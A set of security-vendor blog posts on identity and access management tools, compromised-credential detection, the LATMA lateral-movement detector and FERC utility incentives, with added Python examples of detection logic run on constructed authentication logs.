As cyber threats become increasingly sophisticated, identity and access management (IAM) is critical for enterprises to secure their users, systems, and sensitive data. However, with a plethora of tools promising to streamline IAM, determining the right approach for an organization’s needs can be challenging.
We recently released a first-of-its-kind global report on the identity attack surface, jointly prepared by Silverfort and Osterman Research – The State of the Identity Attack Surface: Insights into Critical Security Gaps. The report provides two key insights for security stakeholders:

- Identity is a highly targeted attack surface, with compromised user credentials serving as the main attack vector.
- Security controls for this attack surface are poorly implemented in most organizations, leaving them at critical risk.

## What is Identity and Access Management (IAM)?

IAM enables the right individuals to access the right resources at the right times for the right reasons. IAM tools provide authentication, authorization, and identity governance for an organization’s digital assets, including data, applications, infrastructure, and connected devices. IAM thus consists of three components: authentication verifies a user’s identity, authorization determines their access privileges, and identity governance enforces compliance. Together, these components grant employees, partners, and customers appropriate access to organizational resources while reducing the risks of data breaches and cyber threats. Effective IAM is crucial for security and compliance.

IAM presents a significant challenge for enterprises with many resources, users, and access requirements. Enterprise IAM tools streamline and govern identity and access across an organization. Key features include:

- Centralized user directory to manage employee and non-employee credentials in one place.
- Role-based access controls (RBAC) to minimize excessive permissions and ensure least privilege access.
- Workflow automation to approve, certify, and revoke access requests and access privileges according to defined policies.
- Audit reporting and analytics to monitor access, detect anomalies, and generate insights for risk mitigation.
- Integration with IT infrastructure and security tools to provide a seamless IAM experience across domains.
- Scalability to handle tens of millions of identities, credentials, and access points without impacting performance or user experience.
- Flexible deployment to allow integration with existing infrastructure, including on-prem, cloud-based, and hybrid environments.

## The Identity Attack Surface and the Need for IAM Tools

The identity attack surface includes all the organizational resources that can be accessed with user credentials. Therefore, attackers that possess user credentials will be able to use them for malicious access, account takeover, lateral movement, and ransomware spread. As cloud services, blockchain, IoT, and AI continue to grow in use, and cyber threats grow more sophisticated, IAM tools are becoming increasingly important. They enable organizations to effectively monitor and control authentication and authorization processes, enforce stringent security policies, and keep a vigilant eye on user activities and access patterns. The deployment of IAM tools is crucial to mitigate risks, ensure regulatory compliance, and protect sensitive data.

To address the threat of attackers using compromised credentials for malicious access, IAM solutions need to incorporate a variety of tools and technologies, including multi-factor authentication (MFA), single sign-on (SSO), privileged access management (PAM), and thorough identity governance. Traditional or manual IAM processes fall short in addressing the sheer volume and complexity of modern networks. This leads to security gaps, operational inefficiencies, and a poor user experience. The best IAM tools incorporate an automated approach to identity management and security, and comprehensive account visibility. Consequently, IAM has emerged as a top priority for Chief Information Security Officers (CISOs) and security professionals aiming to fortify their cyber defense mechanisms.
## Evaluating the Leading IAM Tools in the Market

Robust IAM is imperative for efficient identity and access management. The current market leaders include:

### Microsoft Entra ID

Entra ID offers a comprehensive IAM suite, ideal for organizations deeply embedded in the Microsoft ecosystem. It stands out for its SSO capabilities across multiple Microsoft and third-party applications, enhancing user access management. Its Conditional Access feature allows for detailed access control policies, enhancing security.

### Okta

Okta is a cloud-based IAM platform with a user-friendly design and extensive pre-built integrations with various applications. Okta is ideal for streamlined access management, offering features like SSO, MFA, and adaptive authentication.

### Ping Identity

Ping Identity offers diverse features like SSO, MFA, and identity governance, focusing on granular user access control and strict policy enforcement. Its versatility in supporting various authentication methods enhances its adaptability.

### IBM Security Identity and Access Management

IBM’s suite, including IBM Security Access Manager and IBM Identity Governance and Intelligence, is known for its scalability and advanced access control. It is ideally suited for large enterprises with complex IAM requirements, as it combines user authentication, policy enforcement and governance, and the management of diverse user bases and regulatory compliance.

### ForgeRock Identity Platform

ForgeRock addresses a broad spectrum of identity management needs, including Customer Identity and Access Management (CIAM). It’s an optimal choice for organizations aiming to boost customer engagement, allowing seamless management of identities across various channels and easy integration with customer-centric applications.

### OneLogin

OneLogin is a cloud-based IAM solution that offers swift deployment. It simplifies integration efforts by providing SSO, MFA, and adaptive authentication, and has a broad range of connectors for third-party applications.
It’s ideal for businesses seeking a simple, scalable, and user-friendly IAM option.

### SailPoint IdentityNow

SailPoint IdentityNow is ideal for compliance and role-based access control. It facilitates efficient identity management, automates provisioning and deprovisioning, and ensures adherence to compliance standards. It also offers an intuitive interface for complex IAM operations.

### Silverfort IAM Integration

Silverfort offers a unified identity protection platform that consolidates security controls across on-prem, cloud and hybrid environments, and can automatically discover and analyze access attempts and identity threats. Silverfort’s key feature is its ability to provide full visibility into user and service accounts, and to extend security controls such as MFA, conditional access and risk-based authentication policies to legacy on-prem resources. Silverfort’s unified identity protection platform integrates seamlessly with existing systems and IT infrastructures, including Active Directory (AD), Entra ID, legacy homegrown applications, file shares, and command-line tools. Lastly, Silverfort offers a unified approach that not only provides a consistent, less confusing experience but also means that users don’t have to authenticate multiple times just because they’re accessing resources managed by different IAM tools.

---

- Published: 2023-10-01
- Modified: 2024-07-04
- URL: https://www.silverfort.com/blog/detecting-compromised-credentials/

Among cybersecurity threats, compromised credentials are a critical and often understated one. With attackers increasingly targeting user login details, such breaches have become a primary catalyst for cyber intrusions. Verizon’s 2022 Data Breach Investigations Report indicates that compromised credentials are involved in nearly half of all cyberattacks, highlighting the need for robust defenses against these vulnerabilities.
In most cases, these credential theft incidents occur when unauthorized individuals obtain legitimate user credentials through phishing, brute-force attacks, credential stuffing attacks, social engineering, or the exploitation of security weaknesses. This access enables attackers to infiltrate networks and systems, often undetected, by disguising themselves as legitimate users. Due to the stealthy nature of such attacks, they blend into regular user activity, bypassing traditional security measures designed primarily for external threats.

## Understanding the Threat Landscape

The threat landscape surrounding compromised credentials is both diverse and sophisticated, making it a formidable challenge for cybersecurity teams. It is common for attackers to use a variety of tactics to obtain credentials, such as sophisticated phishing schemes, exploiting system vulnerabilities, and employing social engineering techniques. The methods of attack are constantly evolving, making it essential for organizations to keep up to date with the latest attack vectors.

The impact of credential compromise goes beyond mere unauthorized access. It may result in more severe consequences such as data breaches, financial losses, and reputational damage. It is common for attackers to use stolen credentials to perform actions that appear legitimate, as this makes their activities harder to detect and enables them to move laterally within a network, escalate privileges, and access sensitive data.

The rise of remote work and the increased reliance on cloud-based services have expanded the potential attack surface. This shift necessitates a more comprehensive approach to identity and access management. Traditional perimeter-based defenses are no longer sufficient; organizations need to implement robust identity-centric security measures that encompass all users and endpoints, regardless of their location.
## Identity: The New Attack Surface

Identity has become the new attack surface in cybersecurity as a result of the shift towards digital and cloud-based solutions. As the security perimeter extends beyond traditional network boundaries to individual identities, protecting user credentials becomes as crucial as safeguarding the network itself. This paradigm shift demands a more focused approach to identity security.

Silverfort’s innovative solutions address this evolving attack surface by enhancing identity protection. With advanced authentication measures and continuous monitoring of user behavior, Silverfort’s technologies offer an added layer of defense, ensuring that compromised credentials do not lead to unauthorized access and thus fortifying the organization’s cybersecurity posture.

## Techniques for Detecting Compromised Credentials

Detecting compromised credentials requires a multifaceted approach that leverages advanced technologies and strategies to identify unauthorized access. One key method is the implementation of User Entity and Behavioral Analytics (UEBA). UEBA systems, which are integral to modern Security Information and Event Management (SIEM) platforms, use machine learning to establish normal behavior patterns for each user. To identify potentially compromised accounts, the system monitors deviations from these patterns.

Another effective technique involves the creation of preassembled user activity timelines. With this feature, which is usually found in advanced UEBA solutions, a chronological sequence of user actions is automatically generated, simplifying the process of identifying suspicious activity. This approach shortens the response time to potential threats, reduces the likelihood of false positives, and simplifies the investigation process.

Combining technological solutions with human expertise is also crucial.
While automated systems provide valuable data, experienced security professionals play an important role in interpreting this information and making informed decisions. From the combination of technology and expertise, an effective defense strategy against credential compromise can be developed.

Silverfort’s Unified Identity Protection platform is designed to detect and prevent attacks that utilize compromised credentials to access enterprise resources. It does this through continuous monitoring of all access requests across all authentication protocols, for both user-to-machine and machine-to-machine access, across all resources and environments. When Silverfort identifies abnormal activity, such as during lateral movement attacks, it can step up the authentication requirements in real-time to block access or require the user to authenticate with Multi-Factor Authentication (MFA). This is possible due to Silverfort’s holistic visibility into the entire authentication activity of each user, which enables it to evaluate the behavior profile of users with high precision.

For example, in a scenario where an attacker attempts to log in to a machine using compromised user credentials, Silverfort’s policy would require MFA. The actual user, the legitimate owner of the credentials, would be prompted to verify the authentication. If the attacker can’t complete the authentication, access to the resource is blocked, and the Security Operations Center (SOC) is immediately notified by Silverfort about the attempt.

Furthermore, Silverfort’s platform integrates with Identity Providers in the enterprise environment to apply continuous monitoring, risk analysis, and access policy enforcement on each and every access attempt to any on-prem and cloud resource.
This extends Risk-Based Authentication and MFA to resources and access interfaces that could not be protected before, including the Active Directory command line remote access interfaces upon which automated ransomware propagation relies. In the case of automated ransomware propagation, which relies on authentication with compromised credentials, Silverfort’s continuous monitoring and real-time risk analysis can help detect and prevent such attacks.

## Optimizing Event Response with Preassembled User Activity Timelines

A rapid response to potential threats is essential in cybersecurity. Using preassembled user activity timelines is one of the most effective ways to optimize event response. This technique, integral to advanced User Entity and Behavioral Analytics (UEBA) systems, automatically compiles a detailed chronological sequence of user actions. Through this functionality, security teams gain a comprehensive understanding of user behavior and can quickly identify and investigate anomalies.

Preassembled timelines transform the incident response process. Analysts are able to quickly identify the sequence of events leading to a security alert, distinguish between malicious activities and benign operational changes, and make informed decisions in a timely manner. This capability significantly reduces the time traditionally required to assemble data narratives manually, thus speeding up the response to security incidents. These timelines are especially beneficial in complex environments, where the sheer volume of activities can make manual analysis time-consuming and prone to errors. The use of preassembled timelines permits a more efficient and accurate assessment of potential security incidents by providing a clear and immediate narrative of events.

Silverfort’s Unified Identity Protection platform leverages UEBA to continuously monitor all access requests across all authentication protocols and environments.
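As an added example for the UEBA baseline and preassembled-timeline techniques this post describes (written for this page, not Silverfort’s risk engine), here is a minimal baseline-and-score loop in Python. It learns, per user, the sources, destinations, hours and protocols seen in a constructed history, scores each new event by weighted deviations from that baseline (the weights, alert threshold and hour tolerance are constructed), and for every user whose score crosses the threshold assembles the full chronological timeline, routine events included.

```python
"""Build per-user behaviour baselines from past authentication events,
score new events for deviation (a minimal UEBA), and assemble a
chronological activity timeline for any account whose score crosses an
alert threshold.

Added example for this article, not Silverfort's risk engine. The events,
features, weights and threshold are constructed and deliberately simple."""
from collections import defaultdict
from datetime import datetime

# Event: (timestamp, user, source host, destination host, protocol)
# Constructed history standing in for a learning period of normal activity.
HISTORY = [
    ("2023-10-02T08:05:00", "alice", "WS01", "FS01", "Kerberos"),
    ("2023-10-02T09:10:00", "alice", "WS01", "MAIL01", "Kerberos"),
    ("2023-10-03T08:30:00", "alice", "WS01", "FS01", "Kerberos"),
    ("2023-10-04T17:45:00", "alice", "WS01", "FS01", "Kerberos"),
    ("2023-10-02T08:00:00", "bob", "WS02", "DC01", "Kerberos"),
    ("2023-10-03T08:15:00", "bob", "WS02", "SQL01", "NTLMv2"),
]
# Constructed events from the monitored period.
NEW_EVENTS = [
    ("2023-10-16T08:12:00", "alice", "WS01", "FS01", "Kerberos"),  # routine
    ("2023-10-16T02:40:00", "alice", "WS19", "DC01", "NTLMv2"),    # new source, target, hour and protocol
    ("2023-10-16T02:41:00", "alice", "WS19", "SQL01", "NTLMv2"),
    ("2023-10-16T09:00:00", "bob", "WS02", "SQL01", "NTLMv2"),     # routine, an hour later than usual
]
WEIGHTS = {"new_source": 2, "new_destination": 1, "unusual_hour": 2, "new_protocol": 1}
ALERT_THRESHOLD = 4
HOUR_TOLERANCE = 1   # an hour this close to a baseline hour counts as normal (no midnight wrap)


def hour_of(ts):
    return datetime.fromisoformat(ts).hour


def build_baselines(history):
    """Per-user sets of the sources, destinations, hours and protocols seen."""
    base = defaultdict(lambda: {"sources": set(), "destinations": set(),
                                "hours": set(), "protocols": set()})
    for ts, user, src, dst, proto in history:
        b = base[user]
        b["sources"].add(src)
        b["destinations"].add(dst)
        b["hours"].add(hour_of(ts))
        b["protocols"].add(proto)
    return base


def score_event(baselines, event):
    """Return (score, reasons) for one event; a user with no baseline deviates on everything."""
    ts, user, src, dst, proto = event
    b = baselines[user]
    reasons = []
    if src not in b["sources"]:
        reasons.append("new_source")
    if dst not in b["destinations"]:
        reasons.append("new_destination")
    if not any(abs(hour_of(ts) - h) <= HOUR_TOLERANCE for h in b["hours"]):
        reasons.append("unusual_hour")
    if proto not in b["protocols"]:
        reasons.append("new_protocol")
    return sum(WEIGHTS[r] for r in reasons), reasons


def analyze(history, new_events):
    """Return (flagged users, preassembled timelines for those users)."""
    baselines = build_baselines(history)
    timelines, flagged = defaultdict(list), set()
    for ev in sorted(new_events, key=lambda e: e[0]):
        score, reasons = score_event(baselines, ev)
        timelines[ev[1]].append({"ts": ev[0], "src": ev[2], "dst": ev[3],
                                 "proto": ev[4], "score": score, "reasons": reasons})
        if score >= ALERT_THRESHOLD:
            flagged.add(ev[1])
    # The timeline keeps the routine events around the anomaly too, so an
    # analyst sees the whole sequence rather than an isolated alert.
    return flagged, {u: timelines[u] for u in flagged}


def render_timeline(user, entries):
    """Plain-text timeline lines for an analyst."""
    return [f"{e['ts']} {user} {e['src']}->{e['dst']} {e['proto']} "
            f"score={e['score']} {','.join(e['reasons']) or 'baseline'}" for e in entries]


if __name__ == "__main__":
    flagged, timelines = analyze(HISTORY, NEW_EVENTS)
    for user in sorted(flagged):
        print("\n".join(render_timeline(user, timelines[user])))
```

Only alice is flagged: her two night-time NTLMv2 logons from an unfamiliar workstation score 6 each, while bob’s logon an hour later than usual scores 0 because the hour tolerance absorbs it. The rendered timeline lists her 08:12 routine logon alongside the two anomalies, which is what lets an analyst see that the odd activity was followed by ordinary use of the same account.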
It uses behavioral analysis to identify abnormal activity patterns. By doing this, Silverfort is able to detect potential threats and compromised credentials, as well as step up authentication requirements in real-time to prevent unauthorized access. Behavior analysis is also used to assess the risk associated with every authentication attempt, providing actionable insights into overall account activity to the Security Operations Center (SOC). This approach not only streamlines the incident response process but also reinforces the overall security posture of the organization.

## Best Practices for Detection and Mitigation of Compromised Credential Attacks

To maintain robust security defenses, cybersecurity professionals must detect and mitigate compromised credential attacks. The following are some best practices to consider:

- Implement Continuous Monitoring and Adaptive Security Measures: Establishing a continuous monitoring system is essential for detecting anomalies in real-time. Adaptive security measures are essential to responding to cyber threats, as they adjust based on observed behaviors and emerging threats. With this approach, potential breaches are identified and addressed promptly, reducing the window of opportunity for attackers.
- Employ Advanced Technologies like UEBA for Deeper Insights into User Behavior: Utilizing User Entity and Behavioral Analytics (UEBA) provides an in-depth analysis of user activities and identifies deviations from typical behavior patterns. UEBA’s sophisticated algorithms make it possible to detect subtle anomalies that may indicate compromised credentials, providing an early warning system against potential breaches.
- Combine Automated Solutions with Expert Analysis for a Comprehensive Defense Strategy: While automated technologies like UEBA are powerful tools for detecting compromised credentials, they are most effective when combined with human expertise.
Based on the insights provided by automated systems, skilled analysts can interpret the data, provide context, and make informed decisions. This blend of technology and human intelligence is key to a well-rounded cybersecurity strategy.

- Stay Updated with the Latest Threat Intelligence and Adapt Security Protocols Accordingly: The cybersecurity landscape is constantly evolving, with new threats emerging regularly. Staying informed about the latest trends and threat intelligence is crucial for adapting and updating security protocols effectively. This proactive approach helps organizations keep one step ahead of potential attackers.

Silverfort’s solutions play a vital role in this enhanced security posture. By integrating seamlessly with existing Identity and Access Management (IAM) infrastructures, Silverfort’s Identity Threat Detection and Response (ITDR) and UEBA technologies provide comprehensive protection. They not only detect unusual access attempts that may indicate compromised credentials but also actively prevent unauthorized access. This proactive stance, leveraging advanced analytics and adaptive response mechanisms, positions Silverfort as a formidable ally in the fight against credential compromise, ensuring a more secure and resilient digital environment for your organization.

---

- Published: 2023-09-28
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/open-sourcing-our-lateral-movement-detection-tool-latma/

Collect authentication traffic from Active Directory, then create a detailed report (and GIF) that outlines lateral movement patterns.

Lateral movement detection is a challenge every cybersecurity researcher is likely familiar with. My team and I faced this challenge a few months ago and, unsurprisingly, quickly discovered there is no easy or fast solution to address it.
Well, after a little trial and error, my team and I developed an algorithm named “LATMA” (short for Lateral Movement Analyzer) to significantly improve our ability to detect lateral movement. Knowing that detecting lateral movement is a challenge for nearly every SOC team, we decided to implement it as a free, open-source tool that identifies all suspicious movements in an environment and creates a detailed report.

LATMA consists of two modules:

- Logs Collector – This module collects authentication traffic from the Active Directory (AD) environment. It gathers the logs from the domain controllers and endpoints, focusing only on interactive Kerberos and NTLM authentications. This LATMA module is open-source and can be found here on GitHub.
- Analyzer Module – This module takes the logs from the collector as input and outputs a detailed report containing the patterns that LATMA found, how they’re connected, and who performed them and when. It also visualizes the findings in a GIF. The free LATMA Analyzer Module can be found under Resources on the Silverfort website.

Sometimes the hardest part in dealing with an alert is not just knowing it happened but convincing your team that it was not a false alarm. The output of the LATMA tool is readable and clear to address this challenge.

We ran LATMA on dozens of data sets from different environments. The bottom line is that it detected 95% of lateral movements and generated a false alarm approximately once every three days — almost 30 times better than other existing algorithms!

Watch this full demo of LATMA, from 16:54 – 30:44.

With the MGM and Caesars hack top of mind, we’ll do what we can to help our fellow security practitioners speed up detection. In the rest of this post, I’ll explain the challenge of detecting lateral movement and show you how my team thought through this algorithm to get much better results than other tools available.
## Understanding Lateral Movement By Examining a Recent Attack

Before discussing the detection of lateral movement, let’s first define exactly what it is. And there’s no better way to do this than by using an example. A few months ago, hackers from the cybercriminal group Lapsus$ gained access to Uber’s systems via a VPN with regular user credentials they acquired using a social engineering technique called “MFA bombing.” The attackers scanned the network to find valuable information and eventually found a PowerShell script that contained admin credentials. They then used this admin’s credentials to log in to a database and expose sensitive company information. This attack consisted of several steps:

- Getting initial access to Uber’s systems — in this case through social engineering.
- Searching for information and then using it to access other machines in the network and obtain privileged credentials.
- Using these privileged credentials to fulfill a malicious objective — in this case, exposing sensitive information.

Those three steps occur in almost every successful breach. However, only the second step is considered lateral movement, since it signals the attackers’ ability to move successfully across an organization’s network. This is the step I’ll focus on.

## Understanding the Role Authentication Plays in Lateral Movement

Movement between machines requires authentication. During this phase, the attacker needs to provide credentials to the identity provider, and only after these are verified can they advance to a target machine. The problem is that normal movement between machines requires authentication just as much as malicious movement, and both leave the same traces. This makes distinguishing between normal and malicious movement very hard. One approach to tackling this is through the detection of anomalies; however, this has its own challenges, since many anomalies are actually not malicious.
For example, when an employee goes to their IT department for help and the IT person logs in to the computer of the person who asked for assistance, this is an anomaly — but obviously not a malicious one. Sadly, this is why simple anomaly detection algorithms are not very useful — and why my team and I developed the LATMA algorithm to overcome this obstacle.

### The Three Steps to LATMA Detection

#### Step 1: Build a Graph for Abnormal Authentication Traffic

In this step, LATMA digests the entirety of the authentication traffic in the organization and determines which authentications look normal and which appear abnormal. It does this using information about the domain, such as computer and user roles and their expected behavior. The authentications are then used to build a graph representing the network, where every node represents a computer and every edge represents an authentication. As mentioned previously, though, finding anomalies is not enough to detect lateral movement, so there are several more steps in the process.

#### Step 2: Finding Patterns of Lateral Movement

In this step, we take the authentication graph from the previous step as input and search for lateral movement patterns. These patterns are associated with different types of malicious intent. We classify the patterns into three categories:

- Search patterns – Before attackers perform any movement, they will likely search for a good target to advance to. The pattern is many authentications from a single source (representing the attacker’s current location) to multiple servers.
- Advance patterns – These represent the attackers’ movement between different network assets. The attackers might steal credentials along the way and then use them to advance.
- Act patterns – Usually these occur towards the end of the breach, when the attackers have started to fulfill their malicious objectives. These patterns are often characterized by massive automatic access to multiple machines at once in order to steal information or run malware.
#### Step 3: Alerting

LATMA generates an alert when at least two of these patterns happen in sequence. For example, if the attacker searches for a target machine to advance to and then successfully advances to it, the algorithm generates an alert. In the example, the attack could have been stopped before the acting pattern, because the algorithm generates an alert if it detects an acting pattern connecting to another pattern. Acting patterns usually mean that the attacker has already fulfilled their objectives. In this case, the output of the algorithm can help with the investigation.

### The Proof of LATMA Is in the Results

If you’ve read this far, I hope you’re convinced that this algorithm and tool have value. So I also want to show you that it is extremely accurate. As part of my job at Silverfort, I get to see authentication traffic from hundreds of different environments, and you might be surprised to learn that many of them are targeted by lateral movement attempts. We know this because either our customer discovered it or Silverfort’s platform alerted us to it. That makes this data good for validation, training algorithms, and testing hypotheses.

We ran LATMA on dozens of data sets from different environments. The bottom line is that it detected 95% of lateral movements and generated a false alarm approximately once every three days — almost 30 times better than other existing algorithms!

### Future Work: Where We’re Going With This

The work on the algorithm helped me and my team better understand and model lateral movement attacks. It also made me realize that, despite the significant improvement, there is still a long way to go. Attack surfaces are evolving quickly, and attackers have more and more opportunities to take advantage of this, for example by moving from an on-prem environment to the cloud and vice versa.
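To make the three steps concrete, here is an added toy implementation of the pipeline described above (graph of abnormal authentications, search/advance/act pattern search, alert on two connected patterns in sequence). It is not the LATMA tool's own code, which lives on GitHub and the Silverfort site. The CSV log format, the `BASELINE` dictionary standing in for LATMA's role/expected-behaviour model, the thresholds and the time windows are all assumptions chosen for the constructed sample; the sample itself is made up and includes a lone helpdesk anomaly that, as the post argues, should not raise an alert on its own.

```python
"""Toy LATMA-style detector (added example, not the project's code).

Assumptions: interactive logons arrive as 'time,source,target,account' CSV lines,
and 'normal' is approximated by a per-account set of expected targets.
"""
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

Auth = namedtuple("Auth", "time src dst user")
Pattern = namedtuple("Pattern", "kind start end source nodes")

# Assumed thresholds (the real tool's values are not given in the post).
SEARCH_GAP = timedelta(minutes=10)      # edges closer than this form one fan-out
SEARCH_MIN_TARGETS = 3                  # fan-out wide enough to be a search
ACT_MIN_TARGETS = 5                     # ... and this wide and fast to be an act
ACT_MAX_SPAN = timedelta(seconds=60)
ADVANCE_WINDOW = timedelta(minutes=60)  # logon-in followed by logon-out of a host

# Constructed sample log: a benign helpdesk logon, a search from WS-BOB, an advance
# WS-BOB -> SQL-01 -> DC-01, and an automated burst from DC-01 (act).
SAMPLE_LOG = """\
2023-09-10T09:00:00,WS-ALICE,FS-01,alice
2023-09-10T09:05:00,WS-BOB,FS-01,bob
2023-09-10T09:10:00,WS-HELPDESK,WS-ALICE,it_admin
2023-09-10T10:00:00,WS-BOB,FS-02,bob
2023-09-10T10:00:20,WS-BOB,SQL-01,bob
2023-09-10T10:00:45,WS-BOB,APP-01,bob
2023-09-10T10:01:10,WS-BOB,FS-03,bob
2023-09-10T10:20:00,WS-BOB,SQL-01,bob
2023-09-10T10:25:00,SQL-01,DC-01,svc_backup
2023-09-10T11:00:00,DC-01,WS-ALICE,svc_backup
2023-09-10T11:00:02,DC-01,WS-BOB,svc_backup
2023-09-10T11:00:04,DC-01,FS-02,svc_backup
2023-09-10T11:00:06,DC-01,APP-01,svc_backup
2023-09-10T11:00:08,DC-01,SQL-01,svc_backup
"""

# Constructed stand-in for "domain knowledge": targets each account normally reaches.
BASELINE = {"alice": {"FS-01"}, "bob": {"FS-01"}, "it_admin": set(),
            "svc_backup": {"FS-01"}}


def parse_log(text):
    auths = []
    for line in text.strip().splitlines():
        t, src, dst, user = line.split(",")
        auths.append(Auth(datetime.fromisoformat(t), src, dst, user))
    return sorted(auths, key=lambda a: a.time)


def abnormal_edges(auths, baseline):
    """Step 1: keep only the edges of the graph that fall outside expected behaviour."""
    return [a for a in auths if a.dst not in baseline.get(a.user, set())]


def find_fanouts(edges):
    """Step 2: one source hitting many targets is a search, or an act if it is a burst."""
    by_src = defaultdict(list)
    for e in edges:
        by_src[e.src].append(e)
    patterns = []
    for src, es in by_src.items():
        cluster = [es[0]]
        for e in es[1:] + [None]:           # None flushes the last cluster
            if e is not None and e.time - cluster[-1].time <= SEARCH_GAP:
                cluster.append(e)
                continue
            targets = {c.dst for c in cluster}
            span = cluster[-1].time - cluster[0].time
            if len(targets) >= ACT_MIN_TARGETS and span <= ACT_MAX_SPAN:
                patterns.append(Pattern("act", cluster[0].time, cluster[-1].time, src, {src} | targets))
            elif len(targets) >= SEARCH_MIN_TARGETS:
                patterns.append(Pattern("search", cluster[0].time, cluster[-1].time, src, {src} | targets))
            if e is not None:
                cluster = [e]
    return patterns


def find_advances(edges):
    """Step 2: an abnormal logon into a host followed by an abnormal logon out of it."""
    inbound = defaultdict(list)
    for e in edges:
        inbound[e.dst].append(e)
    patterns, used = [], set()
    for out in edges:
        prior = [i for i in inbound[out.src]
                 if i.time <= out.time and out.time - i.time <= ADVANCE_WINDOW]
        if not prior or prior[-1] in used:   # one advance per pivot logon
            continue
        hop_in = prior[-1]                   # most recent logon into the pivot host
        used.add(hop_in)
        patterns.append(Pattern("advance", hop_in.time, out.time, hop_in.src,
                                {hop_in.src, out.src, out.dst}))
    return patterns


def alerts(patterns):
    """Step 3: alert when a later pattern starts from a host an earlier pattern touched."""
    ordered = sorted(patterns, key=lambda p: p.start)
    found = []
    for i, p1 in enumerate(ordered):
        for p2 in ordered[i + 1:]:
            if p2.start >= p1.end and p2.source in p1.nodes:
                found.append((p1.kind, p2.kind, p2.source))
    return found


def run_latma(log_text=SAMPLE_LOG, baseline=BASELINE):
    edges = abnormal_edges(parse_log(log_text), baseline)
    patterns = find_fanouts(edges) + find_advances(edges)
    return patterns, alerts(patterns)


if __name__ == "__main__":
    pats, als = run_latma()
    for p in sorted(pats, key=lambda p: p.start):
        print(f"{p.kind:8} {p.start:%H:%M:%S}-{p.end:%H:%M:%S} from {p.source}: {sorted(p.nodes)}")
    for a in als:
        print("ALERT:", a)
```

On the sample, the helpdesk logon is abnormal but forms no pattern and raises nothing, while the search from WS-BOB, the two advances through SQL-01 and DC-01, and the burst from DC-01 chain together into search→advance, advance→advance and advance→act alerts, each naming the pivot host so an analyst can follow the path.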
So a potential enhancement to this algorithm would include logs and events from cloud environments and detection of lateral movement that crosses platforms. Stay tuned for more news around LATMA, and be sure to let us know your feedback about this tool.

---

- Published: 2023-09-27
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/how-silverfort-can-enable-utility-companies-take-advantage-of-ferc-incentives/

The constant evolution of cyber threats has made it much more challenging for organizations to protect their identities and secure access to all resources. This is especially true in the utility sector, which continues to experience an increase in cyberattacks that threaten its reliability. In response to a congressional directive to address this growing threat, the Federal Energy Regulatory Commission (FERC) recently revised its regulations to provide utilities the opportunity to receive incentive-based rate recovery when they make certain pre-qualified cybersecurity investments or join a threat information-sharing program. These investments will benefit consumers by encouraging utilities to invest in an Advanced Cybersecurity Technology program and participate in cybersecurity threat information-sharing programs, as directed by the Infrastructure Investment and Jobs Act (IIJA) of 2021.

In this post, we will explain what the incentives for the Advanced Cybersecurity Investment program entail and how Silverfort can help utilities take advantage of the FERC incentives when investing in solutions like Silverfort.

### What is the Advanced Cybersecurity Investment Program?

On July 3, 2023, utilities throughout the United States became eligible to join the Incentives for Advanced Cybersecurity Investment program, a voluntary cyber incentive framework established by the Federal Energy Regulatory Commission under the Infrastructure Investment and Jobs Act developed by the Biden administration.
The order offers an incentive program for qualified investments in cybersecurity. Using this incentive, utilities will be able to claim deferred cost recovery for eligible cybersecurity investments, allowing utilities to include the unamortized portion in their rate base. This incentive applies to expenses such as operation and maintenance costs, labor costs, implementation costs, network monitoring costs, training costs, and software-as-a-service (SaaS) costs. As part of the program, expenses and capital investments are associated with advanced cybersecurity technology as well as participation in a cybersecurity threat information-sharing program.

Section 219A of the Federal Power Act (FPA) defines Advanced Cybersecurity Technology as “any technology, operational capability, or service, including computer hardware, software, or related assets, that enhances the security posture of public utilities through improvements in the ability to protect against, detect, respond to, or recover from a cybersecurity threat.”

The new rule also alleviates one of the main challenges faced by owners and operators of critical infrastructure: a lack of available financial resources to invest in cybersecurity.

### Eligibility for the Advanced Cybersecurity Investment Program

In order to qualify for incentive-based rate treatment, FERC requires energy utilities to align their cybersecurity investments with the following criteria:

- Increases cybersecurity either by implementing Advanced Cybersecurity Technology or participating in a threat information-sharing program.
- Is not already mandated by the Reliability Standards (NERC Reliability Standards define the reliability requirements for planning and operating the North American bulk power system), or otherwise mandated by local, state, or federal law, decision, or directive; otherwise legally mandated; or an action taken in response to a federal or state agency merger condition, consent decree from a federal or state agency, or settlement agreement that resolves a dispute between a utility and a public or private party.

Additionally, the program defined a period of time during which utilities may seek incentive treatment for a particular investment. Specifically, a utility may not request incentive treatment if it has already incurred costs for the investment for more than three months before filing the incentive application.

The Notice of Proposed Rulemaking (NOPR) established two frameworks to identify the types of expenditures eligible for an incentive:

1. Pre-qualified (PQ) list approach: The PQ list will include expenditures as part of the Cyber Risk Information Sharing Program (CRISP) – a public-private partnership that provides relevant and actionable cybersecurity information to participants from the United States electricity industry – as well as expenditures associated with internal network security monitoring of the utility's cyber systems.
2. Case-by-case approach: To allow utilities to request incentives for tailored solutions, FERC will also evaluate cybersecurity expenditures not identified on the PQ list on a case-by-case basis.

According to this policy, FERC will allow utilities to receive incentives for cybersecurity investments made as part of their compliance with cybersecurity-related NERC reliability standards for the period between when the standards are approved by FERC and when they become effective. According to the rule, other potential investments that have not yet been defined by the Commission require "a high degree of confidence that such items will likely materially improve cybersecurity for all utilities." FERC will re-evaluate the pre-qualified investment list periodically.
### Why Is This Program Critical for Electric Utilities?

Because utilities have historically been unable to protect legacy resources with modern security controls, the U.S. electricity grid is an especially attractive target for malicious actors. In failing to take a more proactive approach to security, they are inadvertently providing threat actors with a way to breach resources, resulting in the risk of operational disruption. Because these security controls are not in place, utility organizations also encounter difficulties in complying with existing industry regulations and standards. According to a research report by cybersecurity firm Black Kite, over 25% of the 150 top U.S. energy companies are highly susceptible to ransomware attacks.

As the number of cyberattacks targeting the electric grid increases, the establishment of incentive-based rate treatments for utilities to invest in advanced cybersecurity technologies is a step in the right direction when it comes to helping utility companies modernize their infrastructure, prevent incidents, and comply with requirements.

### How Silverfort Can Help Utilities Maximize Cybersecurity Investments

The traction of clean energy initiatives is causing electric power companies to embrace digital transformation. As a result, new innovations are rapidly transforming electric utilities. However, for many power authorities, these benefits are overshadowed by increasing cybersecurity risks. The consequences of this troublesome reality have already manifested in recent years as highly disruptive state-sponsored attacks against electric grids. To mitigate these risks and, ultimately, gain cyber and operational resilience, all segments of the electric utilities industry must embrace a holistic cybersecurity strategy that protects users' access to critical resources. This is where Silverfort comes into play.

